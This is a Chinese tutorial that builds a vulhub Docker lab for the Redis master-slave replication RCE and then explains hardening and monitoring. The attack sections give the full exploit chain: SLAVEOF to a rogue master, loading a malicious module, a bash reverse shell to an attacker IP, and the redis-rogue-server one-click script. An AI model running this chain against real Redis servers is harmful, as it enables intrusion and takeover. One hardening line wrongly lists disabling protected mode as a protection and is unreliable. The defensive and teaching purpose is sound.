从攻击到防御：手把手教你用Docker搭建Redis主从复制RCE漏洞靶场（附一键POC脚本）

Redis主从复制RCE漏洞实战：从环境搭建到深度防御

Redis作为高性能键值数据库的典型代表，其安全配置往往被开发者忽视。当Redis 4.x/5.x版本遇到不当配置时，主从复制机制可能成为攻击者直捣黄龙的捷径。本文将带您从零构建漏洞靶场，通过手动和自动化两种方式复现攻击链，最后深入探讨防御之道。

1. 漏洞环境快速搭建

在开始实验之前，我们需要一个隔离的测试环境。Docker提供了完美的解决方案，让我们能够快速部署带有漏洞的Redis实例。

首先确保系统已安装Docker和docker-compose。如果使用Kali Linux，这些工具通常已经预装。对于其他Linux发行版，可以通过包管理器安装：

sudo apt-get update && sudo apt-get install -y docker.io docker-compose

接下来创建专用目录并下载漏洞环境：

mkdir redis_rce_lab && cd redis_rce_lab wget https://raw.githubusercontent.com/vulhub/vulhub/master/redis/4-unacc/docker-compose.yml

这个docker-compose.yml文件定义了一个Redis 5.0.5容器，特别配置了无认证访问和主从复制功能。启动环境只需：

docker-compose up -d

环境启动后，可以通过以下命令验证Redis服务状态：

docker ps redis-cli -h 127.0.0.1 -p 6379 ping

如果返回"PONG"，说明环境已就绪。为模拟真实攻击场景，我们还需要准备攻击机环境：

1. 安装Python3和必要的库：pip3 install redis pycryptodome
2. 下载漏洞利用工具包：git clone https://github.com/n0b0dyCN/redis-rogue-server.git
3. 编译恶意模块：cd RedisModulesSDK && make

2. 手动漏洞利用剖析

理解攻击链的每个环节对于安全研究人员至关重要。我们将分步骤拆解主从复制RCE的攻击过程。

2.1 建立主从关系

攻击者首先需要诱使目标Redis实例成为自己的从节点。通过Redis的SLAVEOF命令可以实现这一点：

redis-cli -h 目标IP -p 6379 > SLAVEOF 攻击者IP 9999

这个命令会使目标Redis连接到攻击者指定的"主节点"（实际由攻击者控制），开始同步数据。

2.2 传输恶意模块

当主从关系建立后，攻击者可以通过FULLRESYNC机制将恶意.so文件传输到目标服务器。这个过程模拟了正常的Redis数据同步：

1. 攻击者启动伪造的Redis主节点
2. 目标Redis（从节点）请求全量同步
3. 攻击者发送包含恶意模块的RDB文件

关键点在于构造特殊的RDB文件，其中包含我们预先编译的恶意模块。这个模块实际上是一个共享库，能够扩展Redis的命令集。

2.3 加载并执行模块

一旦恶意模块传输完成，就可以在目标Redis上加载并执行命令：

> MODULE LOAD ./exp.so > system.exec "whoami" > system.exec "bash -c 'bash -i >& /dev/tcp/攻击者IP/4444 0>&1'"

这个过程中有几个技术细节值得注意：

• Redis模块系统原本用于合法功能扩展
• 攻击者滥用模块加载机制引入恶意代码
• system.exec是攻击者自定义的命令，非Redis原生

3. 自动化攻击实战

对于渗透测试人员，手动步骤虽然有助于理解原理，但效率较低。我们可以使用现成的POC脚本实现一键攻击。

3.1 准备攻击脚本

使用之前下载的redis-rogue-server工具：

cd redis-rogue-server python3 redis-master.py -h # 查看帮助

脚本主要参数说明：

• -r目标Redis地址
• -L本地监听IP
• -f恶意模块路径
• -c要执行的命令

3.2 执行攻击

首先在攻击机上启动监听：

nc -lvnp 4444

然后运行攻击脚本：

python3 redis-master.py -r 目标IP -L 攻击者IP -P 6379 -f exp.so -c "反弹shell命令"

脚本会自动完成以下操作：

1. 启动伪主节点服务
2. 诱导目标Redis建立主从关系
3. 传输恶意模块
4. 加载模块并执行命令
5. 清理现场（可选）

3.3 攻击效果验证

成功执行后，可以在nc监听端口中看到目标系统的shell。此时可以进一步执行：

whoami id uname -a

这些命令可以帮助确认获得的权限级别和系统信息。

4. 漏洞原理深度解析

理解漏洞背后的机制对于防御至关重要。这个漏洞实际上是多个因素共同作用的结果。

4.1 Redis模块系统机制

Redis从4.0版本开始引入模块系统，允许开发者通过外部.so文件扩展Redis功能。这种设计本意是好的，但存在安全隐患：

• 模块可以注册新命令
• 模块代码在Redis进程内执行
• 模块可以访问Redis所有API

攻击者正是利用这一点，通过恶意模块实现任意命令执行。

4.2 主从复制协议缺陷

Redis的主从复制协议在设计时没有充分考虑安全性：

• 从节点无条件信任主节点
• 同步过程中不验证数据内容
• 可以传输任意文件而不仅是数据库

这使得攻击者能够通过主从关系将恶意模块注入目标系统。

4.3 配置不当的叠加效应

默认情况下Redis应该：

• 启用认证
• 限制绑定地址
• 关闭保护模式

但很多生产环境中这些安全措施被忽视，导致漏洞可以被远程利用。

5. 全面防御方案

仅仅了解攻击是不够的，构建有效的防御体系才是最终目标。以下是多层次的防护建议。

5.1 基础安全配置

修改redis.conf中的关键参数：

bind 127.0.0.1 protected-mode yes requirepass 强密码 rename-command CONFIG ""

这些配置可以防止未授权访问和关键命令滥用。

5.2 网络层防护

• 使用防火墙限制Redis端口访问
• 考虑使用VPN或跳板机访问管理接口
• 为Redis配置TLS加密（Redis 6+支持）

5.3 运行时保护

• 以非root用户运行Redis
• 使用容器或沙箱隔离
• 启用Redis的ACL功能（Redis 6+）

5.4 监控与审计

• 记录所有Redis命令
• 监控异常的主从连接
• 定期检查加载的模块

# 检查已加载模块 redis-cli MODULE LIST # 查看客户端连接 redis-cli CLIENT LIST

6. 企业级防护实践

对于大型企业环境，需要更全面的安全方案。

6.1 架构设计

• 使用代理中间件（如Twemproxy）
• 实现网络分区（DMZ、VPC）
• 部署Redis集群而非单实例

6.2 安全工具集成

• 部署IDS/IPS检测异常Redis流量
• 使用WAF防护针对Redis的Web攻击
• 集成SIEM系统进行日志分析

6.3 应急响应

建立Redis安全事件响应流程：

1. 立即隔离受影响实例
2. 重置所有访问凭证
3. 审查可能的数据篡改
4. 分析攻击路径和时间线
5. 实施补救措施后恢复服务

在实际运维中，我们曾遇到攻击者利用该漏洞植入挖矿程序的情况。通过完善的监控系统，我们在15分钟内检测到异常CPU使用率，及时遏制了攻击。事后分析发现，攻击者利用了测试环境的Redis实例，这提醒我们所有环境都应遵循相同的安全标准。